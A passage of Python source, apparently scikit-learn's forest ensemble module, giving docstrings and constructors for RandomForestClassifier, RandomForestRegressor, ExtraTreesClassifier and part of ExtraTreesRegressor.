        - If float, then `min_samples_split` is a fraction and
          `ceil(min_samples_split * n_samples)` are the minimum
          number of samples for each split.

        .. versionchanged:: 0.18
           Added float values for fractions.

    min_samples_leaf : int or float, default=1
        The minimum number of samples required to be at a leaf node.
        A split point at any depth will only be considered if it leaves at
        least ``min_samples_leaf`` training samples in each of the left and
        right branches. This may have the effect of smoothing the model,
        especially in regression.

        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a fraction and
          `ceil(min_samples_leaf * n_samples)` are the minimum
          number of samples for each node.

        .. versionchanged:: 0.18
           Added float values for fractions.

    min_weight_fraction_leaf : float, default=0.0
        The minimum weighted fraction of the sum total of weights (of all
        the input samples) required to be at a leaf node. Samples have
        equal weight when sample_weight is not provided.

    max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
        The number of features to consider when looking for the best split:

        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a fraction and
          `round(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=sqrt(n_features)`.
        - If "sqrt", then `max_features=sqrt(n_features)` (same as "auto").
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.

        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.

    max_leaf_nodes : int, default=None
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.

    min_impurity_decrease : float, default=0.0
        A node will be split if this split induces a decrease of the impurity
        greater than or equal to this value.

        The weighted impurity decrease equation is the following::

            N_t / N * (impurity - N_t_R / N_t * right_impurity
                                - N_t_L / N_t * left_impurity)

        where ``N`` is the total number of samples, ``N_t`` is the number of
        samples at the current node, ``N_t_L`` is the number of samples in the
        left child, and ``N_t_R`` is the number of samples in the right child.

        ``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
        if ``sample_weight`` is passed.

        .. versionadded:: 0.19

    min_impurity_split : float, default=None
        Threshold for early stopping in tree growth. A node will split
        if its impurity is above the threshold, otherwise it is a leaf.

        .. deprecated:: 0.19
           ``min_impurity_split`` has been deprecated in favor of
           ``min_impurity_decrease`` in 0.19. The default value of
           ``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
           will be removed in 1.0 (renaming of 0.25).
           Use ``min_impurity_decrease`` instead.

    bootstrap : bool, default=True
        Whether bootstrap samples are used when building trees. If False, the
        whole dataset is used to build each tree.

    oob_score : bool, default=False
        Whether to use out-of-bag samples to estimate the generalization score.
        Only available if bootstrap=True.

    n_jobs : int, default=None
        The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
        :meth:`decision_path` and :meth:`apply` are all parallelized over the
        trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
        context. ``-1`` means using all processors. See :term:`Glossary
        <n_jobs>` for more details.

    random_state : int, RandomState instance or None, default=None
        Controls both the randomness of the bootstrapping of the samples used
        when building trees (if ``bootstrap=True``) and the sampling of the
        features to consider when looking for the best split at each node
        (if ``max_features < n_features``).
        See :term:`Glossary <random_state>` for details.

    verbose : int, default=0
        Controls the verbosity when fitting and predicting.

    warm_start : bool, default=False
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest. See :term:`the Glossary <warm_start>`.

    class_weight : {"balanced", "balanced_subsample"}, dict or list of dicts, \
            default=None
        Weights associated with classes in the form ``{class_label: weight}``.
        If not given, all classes are supposed to have weight one. For
        multi-output problems, a list of dicts can be provided in the same
        order as the columns of y.

        Note that for multioutput (including multilabel) weights should be
        defined for each class of every column in its own dict. For example,
        for four-class multilabel classification weights should be
        [{0: 1, 1: 1}, {0: 1, 1: 5}, {0: 1, 1: 1}, {0: 1, 1: 1}] instead of
        [{1:1}, {2:5}, {3:1}, {4:1}].

        The "balanced" mode uses the values of y to automatically adjust
        weights inversely proportional to class frequencies in the input data
        as ``n_samples / (n_classes * np.bincount(y))``

        The "balanced_subsample" mode is the same as "balanced" except that
        weights are computed based on the bootstrap sample for every tree
        grown.

        For multi-output, the weights of each column of y will be multiplied.

        Note that these weights will be multiplied with sample_weight (passed
        through the fit method) if sample_weight is specified.

    ccp_alpha : non-negative float, default=0.0
        Complexity parameter used for Minimal Cost-Complexity Pruning. The
        subtree with the largest cost complexity that is smaller than
        ``ccp_alpha`` will be chosen. By default, no pruning is performed. See
        :ref:`minimal_cost_complexity_pruning` for details.

        .. versionadded:: 0.22

    max_samples : int or float, default=None
        If bootstrap is True, the number of samples to draw from X
        to train each base estimator.

        - If None (default), then draw `X.shape[0]` samples.
        - If int, then draw `max_samples` samples.
        - If float, then draw `max_samples * X.shape[0]` samples. Thus,
          `max_samples` should be in the interval `(0.0, 1.0]`.

        .. versionadded:: 0.22

    Attributes
    ----------
    base_estimator_ : DecisionTreeClassifier
        The child estimator template used to create the collection of fitted
        sub-estimators.

    estimators_ : list of DecisionTreeClassifier
        The collection of fitted sub-estimators.

    classes_ : ndarray of shape (n_classes,) or a list of such arrays
        The classes labels (single output problem), or a list of arrays of
        class labels (multi-output problem).

    n_classes_ : int or list
        The number of classes (single output problem), or a list containing the
        number of classes for each output (multi-output problem).

    n_features_ : int
        The number of features when ``fit`` is performed.

        .. deprecated:: 1.0
            Attribute `n_features_` was deprecated in version 1.0 and will be
            removed in 1.2. Use `n_features_in_` instead.

    n_features_in_ : int
        Number of features seen during :term:`fit`.

        .. versionadded:: 0.24

    n_outputs_ : int
        The number of outputs when ``fit`` is performed.

    feature_importances_ : ndarray of shape (n_features,)
        The impurity-based feature importances.
        The higher, the more important the feature.
        The importance of a feature is computed as the (normalized)
        total reduction of the criterion brought by that feature.  It is also
        known as the Gini importance.

        Warning: impurity-based feature importances can be misleading for
        high cardinality features (many unique values). See
        :func:`sklearn.inspection.permutation_importance` as an alternative.

    oob_score_ : float
        Score of the training dataset obtained using an out-of-bag estimate.
        This attribute exists only when ``oob_score`` is True.

    oob_decision_function_ : ndarray of shape (n_samples, n_classes) or \
            (n_samples, n_classes, n_outputs)
        Decision function computed with out-of-bag estimate on the training
        set. If n_estimators is small it might be possible that a data point
        was never left out during the bootstrap. In this case,
        `oob_decision_function_` might contain NaN. This attribute exists
        only when ``oob_score`` is True.

    See Also
    --------
    DecisionTreeClassifier, ExtraTreesClassifier

    Notes
    -----
    The default values for the parameters controlling the size of the trees
    (e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
    unpruned trees which can potentially be very large on some data sets. To
    reduce memory consumption, the complexity and size of the trees should be
    controlled by setting those parameter values.

    The features are always randomly permuted at each split. Therefore,
    the best found split may vary, even with the same training data,
    ``max_features=n_features`` and ``bootstrap=False``, if the improvement
    of the criterion is identical for several splits enumerated during the
    search of the best split. To obtain a deterministic behaviour during
    fitting, ``random_state`` has to be fixed.

    References
    ----------
    .. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.

    Examples
    --------
    >>> from sklearn.ensemble import RandomForestClassifier
    >>> from sklearn.datasets import make_classification
    >>> X, y = make_classification(n_samples=1000, n_features=4,
    ...                            n_informative=2, n_redundant=0,
    ...                            random_state=0, shuffle=False)
    >>> clf = RandomForestClassifier(max_depth=2, random_state=0)
    >>> clf.fit(X, y)
    RandomForestClassifier(...)
    >>> print(clf.predict([[0, 0, 0, 0]]))
    [1]
    """

    def __init__(self,
                 n_estimators=100, *,
                 criterion="gini",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 min_impurity_decrease=0.,
                 min_impurity_split=None,
                 bootstrap=True,
                 oob_score=False,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 class_weight=None,
                 ccp_alpha=0.0,
                 max_samples=None):
        # estimator_params names the attributes of *this* estimator that the
        # base class copies onto each cloned DecisionTreeClassifier.
        super().__init__(
            base_estimator=DecisionTreeClassifier(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "min_impurity_decrease", "min_impurity_split",
                              "random_state", "ccp_alpha"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            class_weight=class_weight,
            max_samples=max_samples)

        # Per-tree hyper-parameters are stored on self so that
        # estimator_params (above) can forward them to every tree.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
        self.min_impurity_decrease = min_impurity_decrease
        self.min_impurity_split = min_impurity_split
        self.ccp_alpha = ccp_alpha
class RandomForestRegressor(ForestRegressor):
    """
    A random forest regressor.

    A random forest is a meta estimator that fits a number of classifying
    decision trees on various sub-samples of the dataset and uses averaging
    to improve the predictive accuracy and control over-fitting.
    The sub-sample size is controlled with the `max_samples` parameter if
    `bootstrap=True` (default), otherwise the whole dataset is used to build
    each tree.

    Read more in the :ref:`User Guide <forest>`.

    Parameters
    ----------
    n_estimators : int, default=100
        The number of trees in the forest.

        .. versionchanged:: 0.22
           The default value of ``n_estimators`` changed from 10 to 100
           in 0.22.

    criterion : {"squared_error", "mse", "absolute_error", "poisson"}, \
            default="squared_error"
        The function to measure the quality of a split. Supported criteria
        are "squared_error" for the mean squared error, which is equal to
        variance reduction as feature selection criterion, "absolute_error"
        for the mean absolute error, and "poisson" which uses reduction in
        Poisson deviance to find splits.
        Training using "absolute_error" is significantly slower
        than when using "squared_error".

        .. versionadded:: 0.18
           Mean Absolute Error (MAE) criterion.

        .. versionadded:: 1.0
           Poisson criterion.

        .. deprecated:: 1.0
            Criterion "mse" was deprecated in v1.0 and will be removed in
            version 1.2. Use `criterion="squared_error"` which is equivalent.

        .. deprecated:: 1.0
            Criterion "mae" was deprecated in v1.0 and will be removed in
            version 1.2. Use `criterion="absolute_error"` which is equivalent.

    max_depth : int, default=None
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.

    min_samples_split : int or float, default=2
        The minimum number of samples required to split an internal node:

        - If int, then consider `min_samples_split` as the minimum number.
        - If float, then `min_samples_split` is a fraction and
          `ceil(min_samples_split * n_samples)` are the minimum
          number of samples for each split.

        .. versionchanged:: 0.18
           Added float values for fractions.

    min_samples_leaf : int or float, default=1
        The minimum number of samples required to be at a leaf node.
        A split point at any depth will only be considered if it leaves at
        least ``min_samples_leaf`` training samples in each of the left and
        right branches. This may have the effect of smoothing the model,
        especially in regression.

        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a fraction and
          `ceil(min_samples_leaf * n_samples)` are the minimum
          number of samples for each node.

        .. versionchanged:: 0.18
           Added float values for fractions.

    min_weight_fraction_leaf : float, default=0.0
        The minimum weighted fraction of the sum total of weights (of all
        the input samples) required to be at a leaf node. Samples have
        equal weight when sample_weight is not provided.

    max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
        The number of features to consider when looking for the best split:

        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a fraction and
          `round(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=n_features`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.

        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.

    max_leaf_nodes : int, default=None
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.

    min_impurity_decrease : float, default=0.0
        A node will be split if this split induces a decrease of the impurity
        greater than or equal to this value.

        The weighted impurity decrease equation is the following::

            N_t / N * (impurity - N_t_R / N_t * right_impurity
                                - N_t_L / N_t * left_impurity)

        where ``N`` is the total number of samples, ``N_t`` is the number of
        samples at the current node, ``N_t_L`` is the number of samples in the
        left child, and ``N_t_R`` is the number of samples in the right child.

        ``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
        if ``sample_weight`` is passed.

        .. versionadded:: 0.19

    min_impurity_split : float, default=None
        Threshold for early stopping in tree growth. A node will split
        if its impurity is above the threshold, otherwise it is a leaf.

        .. deprecated:: 0.19
           ``min_impurity_split`` has been deprecated in favor of
           ``min_impurity_decrease`` in 0.19. The default value of
           ``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
           will be removed in 1.0 (renaming of 0.25).
           Use ``min_impurity_decrease`` instead.

    bootstrap : bool, default=True
        Whether bootstrap samples are used when building trees. If False, the
        whole dataset is used to build each tree.

    oob_score : bool, default=False
        Whether to use out-of-bag samples to estimate the generalization score.
        Only available if bootstrap=True.

    n_jobs : int, default=None
        The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
        :meth:`decision_path` and :meth:`apply` are all parallelized over the
        trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
        context. ``-1`` means using all processors. See :term:`Glossary
        <n_jobs>` for more details.

    random_state : int, RandomState instance or None, default=None
        Controls both the randomness of the bootstrapping of the samples used
        when building trees (if ``bootstrap=True``) and the sampling of the
        features to consider when looking for the best split at each node
        (if ``max_features < n_features``).
        See :term:`Glossary <random_state>` for details.

    verbose : int, default=0
        Controls the verbosity when fitting and predicting.

    warm_start : bool, default=False
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest. See :term:`the Glossary <warm_start>`.

    ccp_alpha : non-negative float, default=0.0
        Complexity parameter used for Minimal Cost-Complexity Pruning. The
        subtree with the largest cost complexity that is smaller than
        ``ccp_alpha`` will be chosen. By default, no pruning is performed. See
        :ref:`minimal_cost_complexity_pruning` for details.

        .. versionadded:: 0.22

    max_samples : int or float, default=None
        If bootstrap is True, the number of samples to draw from X
        to train each base estimator.

        - If None (default), then draw `X.shape[0]` samples.
        - If int, then draw `max_samples` samples.
        - If float, then draw `max_samples * X.shape[0]` samples. Thus,
          `max_samples` should be in the interval `(0.0, 1.0]`.

        .. versionadded:: 0.22

    Attributes
    ----------
    base_estimator_ : DecisionTreeRegressor
        The child estimator template used to create the collection of fitted
        sub-estimators.

    estimators_ : list of DecisionTreeRegressor
        The collection of fitted sub-estimators.

    feature_importances_ : ndarray of shape (n_features,)
        The impurity-based feature importances.
        The higher, the more important the feature.
        The importance of a feature is computed as the (normalized)
        total reduction of the criterion brought by that feature.  It is also
        known as the Gini importance.

        Warning: impurity-based feature importances can be misleading for
        high cardinality features (many unique values). See
        :func:`sklearn.inspection.permutation_importance` as an alternative.

    n_features_ : int
        The number of features when ``fit`` is performed.

        .. deprecated:: 1.0
            Attribute `n_features_` was deprecated in version 1.0 and will be
            removed in 1.2. Use `n_features_in_` instead.

    n_features_in_ : int
        Number of features seen during :term:`fit`.

        .. versionadded:: 0.24

    n_outputs_ : int
        The number of outputs when ``fit`` is performed.

    oob_score_ : float
        Score of the training dataset obtained using an out-of-bag estimate.
        This attribute exists only when ``oob_score`` is True.

    oob_prediction_ : ndarray of shape (n_samples,) or (n_samples, n_outputs)
        Prediction computed with out-of-bag estimate on the training set.
        This attribute exists only when ``oob_score`` is True.

    See Also
    --------
    DecisionTreeRegressor, ExtraTreesRegressor

    Notes
    -----
    The default values for the parameters controlling the size of the trees
    (e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
    unpruned trees which can potentially be very large on some data sets. To
    reduce memory consumption, the complexity and size of the trees should be
    controlled by setting those parameter values.

    The features are always randomly permuted at each split. Therefore,
    the best found split may vary, even with the same training data,
    ``max_features=n_features`` and ``bootstrap=False``, if the improvement
    of the criterion is identical for several splits enumerated during the
    search of the best split. To obtain a deterministic behaviour during
    fitting, ``random_state`` has to be fixed.

    The default value ``max_features="auto"`` uses ``n_features``
    rather than ``n_features / 3``. The latter was originally suggested in
    [1], whereas the former was more recently justified empirically in [2].

    References
    ----------
    .. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.

    .. [2] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized
           trees", Machine Learning, 63(1), 3-42, 2006.

    Examples
    --------
    >>> from sklearn.ensemble import RandomForestRegressor
    >>> from sklearn.datasets import make_regression
    >>> X, y = make_regression(n_features=4, n_informative=2,
    ...                        random_state=0, shuffle=False)
    >>> regr = RandomForestRegressor(max_depth=2, random_state=0)
    >>> regr.fit(X, y)
    RandomForestRegressor(...)
    >>> print(regr.predict([[0, 0, 0, 0]]))
    [-8.32987858]
    """

    def __init__(self,
                 n_estimators=100, *,
                 criterion="squared_error",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 min_impurity_decrease=0.,
                 min_impurity_split=None,
                 bootstrap=True,
                 oob_score=False,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 ccp_alpha=0.0,
                 max_samples=None):
        # estimator_params names the attributes of *this* estimator that the
        # base class copies onto each cloned DecisionTreeRegressor.
        super().__init__(
            base_estimator=DecisionTreeRegressor(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "min_impurity_decrease", "min_impurity_split",
                              "random_state", "ccp_alpha"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            max_samples=max_samples)

        # Per-tree hyper-parameters are stored on self so that
        # estimator_params (above) can forward them to every tree.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
        self.min_impurity_decrease = min_impurity_decrease
        self.min_impurity_split = min_impurity_split
        self.ccp_alpha = ccp_alpha
class ExtraTreesClassifier(ForestClassifier):
    """
    An extra-trees classifier.
    This class implements a meta estimator that fits a number of
    randomized decision trees (a.k.a. extra-trees) on various sub-samples
    of the dataset and uses averaging to improve the predictive accuracy
    and control over-fitting.
    Read more in the :ref:`User Guide <forest>`.
    Parameters
    ----------
    n_estimators : int, default=100
        The number of trees in the forest.
        .. versionchanged:: 0.22
           The default value of ``n_estimators`` changed from 10 to 100
           in 0.22.
    criterion : {"gini", "entropy"}, default="gini"
        The function to measure the quality of a split. Supported criteria are
        "gini" for the Gini impurity and "entropy" for the information gain.
    max_depth : int, default=None
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
    min_samples_split : int or float, default=2
        The minimum number of samples required to split an internal node:
        - If int, then consider `min_samples_split` as the minimum number.
        - If float, then `min_samples_split` is a fraction and
          `ceil(min_samples_split * n_samples)` are the minimum
          number of samples for each split.
        .. versionchanged:: 0.18
           Added float values for fractions.
    min_samples_leaf : int or float, default=1
        The minimum number of samples required to be at a leaf node.
        A split point at any depth will only be considered if it leaves at
        least ``min_samples_leaf`` training samples in each of the left and
        right branches.  This may have the effect of smoothing the model,
        especially in regression.
        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a fraction and
          `ceil(min_samples_leaf * n_samples)` are the minimum
          number of samples for each node.
        .. versionchanged:: 0.18
           Added float values for fractions.
    min_weight_fraction_leaf : float, default=0.0
        The minimum weighted fraction of the sum total of weights (of all
        the input samples) required to be at a leaf node. Samples have
        equal weight when sample_weight is not provided.
    max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
        The number of features to consider when looking for the best split:
        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a fraction and
          `round(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=sqrt(n_features)`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.
    max_leaf_nodes : int, default=None
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
    min_impurity_decrease : float, default=0.0
        A node will be split if this split induces a decrease of the impurity
        greater than or equal to this value.
        The weighted impurity decrease equation is the following::
            N_t / N * (impurity - N_t_R / N_t * right_impurity
                    - N_t_L / N_t * left_impurity)
        where ``N`` is the total number of samples, ``N_t`` is the number of
        samples at the current node, ``N_t_L`` is the number of samples in the
        left child, and ``N_t_R`` is the number of samples in the right child.
        ``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
        if ``sample_weight`` is passed.
        .. versionadded:: 0.19
    min_impurity_split : float, default=None
        Threshold for early stopping in tree growth. A node will split
        if its impurity is above the threshold, otherwise it is a leaf.
        .. deprecated:: 0.19
           ``min_impurity_split`` has been deprecated in favor of
           ``min_impurity_decrease`` in 0.19. The default value of
           ``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
           will be removed in 1.0 (renaming of 0.25).
           Use ``min_impurity_decrease`` instead.
    bootstrap : bool, default=False
        Whether bootstrap samples are used when building trees. If False, the
        whole dataset is used to build each tree.
    oob_score : bool, default=False
        Whether to use out-of-bag samples to estimate the generalization score.
        Only available if bootstrap=True.
    n_jobs : int, default=None
        The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
        :meth:`decision_path` and :meth:`apply` are all parallelized over the
        trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
        context. ``-1`` means using all processors. See :term:`Glossary
        <n_jobs>` for more details.
    random_state : int, RandomState instance or None, default=None
        Controls 3 sources of randomness:
        - the bootstrapping of the samples used when building trees
          (if ``bootstrap=True``)
        - the sampling of the features to consider when looking for the best
          split at each node (if ``max_features < n_features``)
        - the draw of the splits for each of the `max_features`
        See :term:`Glossary <random_state>` for details.
    verbose : int, default=0
        Controls the verbosity when fitting and predicting.
    warm_start : bool, default=False
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest. See :term:`the Glossary <warm_start>`.
    class_weight : {"balanced", "balanced_subsample"}, dict or list of dicts, \
            default=None
        Weights associated with classes in the form ``{class_label: weight}``.
        If not given, all classes are supposed to have weight one. For
        multi-output problems, a list of dicts can be provided in the same
        order as the columns of y.
        Note that for multioutput (including multilabel) weights should be
        defined for each class of every column in its own dict. For example,
        for four-class multilabel classification weights should be
        [{0: 1, 1: 1}, {0: 1, 1: 5}, {0: 1, 1: 1}, {0: 1, 1: 1}] instead of
        [{1:1}, {2:5}, {3:1}, {4:1}].
        The "balanced" mode uses the values of y to automatically adjust
        weights inversely proportional to class frequencies in the input data
        as ``n_samples / (n_classes * np.bincount(y))``
        The "balanced_subsample" mode is the same as "balanced" except that
        weights are computed based on the bootstrap sample for every tree
        grown.
        For multi-output, the weights of each column of y will be multiplied.
        Note that these weights will be multiplied with sample_weight (passed
        through the fit method) if sample_weight is specified.
    ccp_alpha : non-negative float, default=0.0
        Complexity parameter used for Minimal Cost-Complexity Pruning. The
        subtree with the largest cost complexity that is smaller than
        ``ccp_alpha`` will be chosen. By default, no pruning is performed. See
        :ref:`minimal_cost_complexity_pruning` for details.
        .. versionadded:: 0.22
    max_samples : int or float, default=None
        If bootstrap is True, the number of samples to draw from X
        to train each base estimator.
        - If None (default), then draw `X.shape[0]` samples.
        - If int, then draw `max_samples` samples.
        - If float, then draw `max_samples * X.shape[0]` samples. Thus,
          `max_samples` should be in the interval `(0.0, 1.0]`.
        .. versionadded:: 0.22
    Attributes
    ----------
    base_estimator_ : ExtraTreeClassifier
        The child estimator template used to create the collection of fitted
        sub-estimators.
    estimators_ : list of ExtraTreeClassifier
        The collection of fitted sub-estimators.
    classes_ : ndarray of shape (n_classes,) or a list of such arrays
        The classes labels (single output problem), or a list of arrays of
        class labels (multi-output problem).
    n_classes_ : int or list
        The number of classes (single output problem), or a list containing the
        number of classes for each output (multi-output problem).
    feature_importances_ : ndarray of shape (n_features,)
        The impurity-based feature importances.
        The higher, the more important the feature.
        The importance of a feature is computed as the (normalized)
        total reduction of the criterion brought by that feature.  It is also
        known as the Gini importance.
        Warning: impurity-based feature importances can be misleading for
        high cardinality features (many unique values). See
        :func:`sklearn.inspection.permutation_importance` as an alternative.
    n_features_ : int
        The number of features when ``fit`` is performed.
        .. deprecated:: 1.0
            Attribute `n_features_` was deprecated in version 1.0 and will be
            removed in 1.2. Use `n_features_in_` instead.
    n_features_in_ : int
        Number of features seen during :term:`fit`.
        .. versionadded:: 0.24
    n_outputs_ : int
        The number of outputs when ``fit`` is performed.
    oob_score_ : float
        Score of the training dataset obtained using an out-of-bag estimate.
        This attribute exists only when ``oob_score`` is True.
    oob_decision_function_ : ndarray of shape (n_samples, n_classes) or \
            (n_samples, n_classes, n_outputs)
        Decision function computed with out-of-bag estimate on the training
        set. If n_estimators is small it might be possible that a data point
        was never left out during the bootstrap. In this case,
        `oob_decision_function_` might contain NaN. This attribute exists
        only when ``oob_score`` is True.
    See Also
    --------
    sklearn.tree.ExtraTreeClassifier : Base classifier for this ensemble.
    RandomForestClassifier : Ensemble Classifier based on trees with optimal
        splits.
    Notes
    -----
    The default values for the parameters controlling the size of the trees
    (e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
    unpruned trees which can potentially be very large on some data sets. To
    reduce memory consumption, the complexity and size of the trees should be
    controlled by setting those parameter values.
    References
    ----------
    .. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized
           trees", Machine Learning, 63(1), 3-42, 2006.
    Examples
    --------
    >>> from sklearn.ensemble import ExtraTreesClassifier
    >>> from sklearn.datasets import make_classification
    >>> X, y = make_classification(n_features=4, random_state=0)
    >>> clf = ExtraTreesClassifier(n_estimators=100, random_state=0)
    >>> clf.fit(X, y)
    ExtraTreesClassifier(random_state=0)
    >>> clf.predict([[0, 0, 0, 0]])
    array([1])
    """
    def __init__(self,
                 n_estimators=100, *,
                 criterion="gini",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 min_impurity_decrease=0.,
                 min_impurity_split=None,
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 class_weight=None,
                 ccp_alpha=0.0,
                 max_samples=None):
        # ``estimator_params`` names the constructor arguments forwarded
        # verbatim to every ExtraTreeClassifier in the ensemble.
        super().__init__(
            base_estimator=ExtraTreeClassifier(),
            n_estimators=n_estimators,
            estimator_params=("criterion", "max_depth", "min_samples_split",
                              "min_samples_leaf", "min_weight_fraction_leaf",
                              "max_features", "max_leaf_nodes",
                              "min_impurity_decrease", "min_impurity_split",
                              "random_state", "ccp_alpha"),
            bootstrap=bootstrap,
            oob_score=oob_score,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose,
            warm_start=warm_start,
            class_weight=class_weight,
            max_samples=max_samples)
        # Tree-level hyper-parameters are stored on ``self`` so that
        # ``get_params``/``set_params`` (and therefore ``clone``) see them.
        self.criterion = criterion
        self.max_depth = max_depth
        self.min_samples_split = min_samples_split
        self.min_samples_leaf = min_samples_leaf
        self.min_weight_fraction_leaf = min_weight_fraction_leaf
        self.max_features = max_features
        self.max_leaf_nodes = max_leaf_nodes
        self.min_impurity_decrease = min_impurity_decrease
        self.min_impurity_split = min_impurity_split
        self.ccp_alpha = ccp_alpha
class ExtraTreesRegressor(ForestRegressor):
    """
    An extra-trees regressor.
    This class implements a meta estimator that fits a number of
    randomized decision trees (a.k.a. extra-trees) on various sub-samples
    of the dataset and uses averaging to improve the predictive accuracy
    and control over-fitting.
    Read more in the :ref:`User Guide <forest>`.
    Parameters
    ----------
    n_estimators : int, default=100
        The number of trees in the forest.
        .. versionchanged:: 0.22
           The default value of ``n_estimators`` changed from 10 to 100
           in 0.22.
    criterion : {"squared_error", "mse", "absolute_error", "mae"}, \
            default="squared_error"
        The function to measure the quality of a split. Supported criteria
        are "squared_error" for the mean squared error, which is equal to
        variance reduction as feature selection criterion, and "absolute_error"
        for the mean absolute error.
        .. versionadded:: 0.18
           Mean Absolute Error (MAE) criterion.
        .. deprecated:: 1.0
            Criterion "mse" was deprecated in v1.0 and will be removed in
            version 1.2. Use `criterion="squared_error"` which is equivalent.
        .. deprecated:: 1.0
            Criterion "mae" was deprecated in v1.0 and will be removed in
            version 1.2. Use `criterion="absolute_error"` which is equivalent.
    max_depth : int, default=None
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
    min_samples_split : int or float, default=2
        The minimum number of samples required to split an internal node:
        - If int, then consider `min_samples_split` as the minimum number.
        - If float, then `min_samples_split` is a fraction and
          `ceil(min_samples_split * n_samples)` are the minimum
          number of samples for each split.
        .. versionchanged:: 0.18
           Added float values for fractions.
    min_samples_leaf : int or float, default=1
        The minimum number of samples required to be at a leaf node.
        A split point at any depth will only be considered if it leaves at
        least ``min_samples_leaf`` training samples in each of the left and
        right branches.  This may have the effect of smoothing the model,
        especially in regression.
        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a fraction and
          `ceil(min_samples_leaf * n_samples)` are the minimum
          number of samples for each node.
